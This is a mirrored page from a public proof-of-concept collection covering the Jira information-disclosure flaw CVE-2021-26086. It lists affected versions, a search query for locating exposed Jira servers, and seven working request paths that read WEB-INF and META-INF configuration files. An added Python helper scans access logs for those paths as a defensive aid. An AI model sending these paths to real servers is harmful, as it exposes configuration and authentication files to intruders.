mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 04:18:39 +00:00
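# Atlassian Jira Sensitive Information Disclosure CVE-2021-26086

## Vulnerability Description

Jira is a project and issue tracking tool from Atlassian, widely used for defect tracking, customer service, requirements gathering, process approval, task tracking, project tracking, and agile management.

Reference:

- https://jira.atlassian.com/browse/JRASERVER-72695
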
## Affected Versions

```
version < 8.5.14
8.6.0 ≤ version < 8.13.6
8.14.0 ≤ version < 8.16.1
```

## Network Mapping

```
app="ATLASSIAN-JIRA"
```

## Vulnerability Reproduction

PoC:

```
/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
```
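
A log-review helper for defenders, added here as an example and not part of the original repository: it checks a Jira version string against the ranges listed above and flags access-log requests shaped like the paths above, including percent-encoded variants. The combined log format, the function names, and the sample log lines are assumptions.

```python
import re
from urllib.parse import unquote

# Affected ranges as listed on this page, as [low, high) tuples.
AFFECTED = [((0, 0, 0), (8, 5, 14)), ((8, 6, 0), (8, 13, 6)), ((8, 14, 0), (8, 16, 1))]

# "/s/..." static-resource prefix, then a ";" path-parameter segment followed
# by a protected directory, as in the request paths above.
SUSPICIOUS = re.compile(r"^/s/[^?#]*;[^/]*/(WEB-INF|META-INF)/", re.IGNORECASE)

# Request line and status inside a combined-format log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def is_affected(version: str) -> bool:
    """True if a Jira version string such as '8.13.5' is in a listed range."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    parts += (0,) * (3 - len(parts))
    return any(low <= parts < high for low, high in AFFECTED)


def is_suspicious_path(raw_path: str) -> bool:
    """Decode percent-encoding (twice, to catch double encoding) and match."""
    path = unquote(unquote(raw_path.split("?", 1)[0]))
    return bool(SUSPICIOUS.match(path))


def scan(lines):
    """Return (path, status) for each log line whose request path matches."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and is_suspicious_path(m.group(1)):
            hits.append((m.group(1), int(m.group(2))))
    return hits


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2022:10:00:00 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 4512',
    '192.0.2.10 - - [01/Jan/2022:10:00:01 +0000] "GET /s/abc/_/%3b/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Jan/2022:10:00:02 +0000] "GET /s/d41d8c/_/download/resources/jira.webresources/global.css HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2022:10:00:03 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 15000',
]

if __name__ == "__main__":
    for path, status in scan(SAMPLE_LOG):
        print(f"status={status} path={path}")
```

A hit with status 200 means the file was actually served and should be prioritised over hits that returned 404.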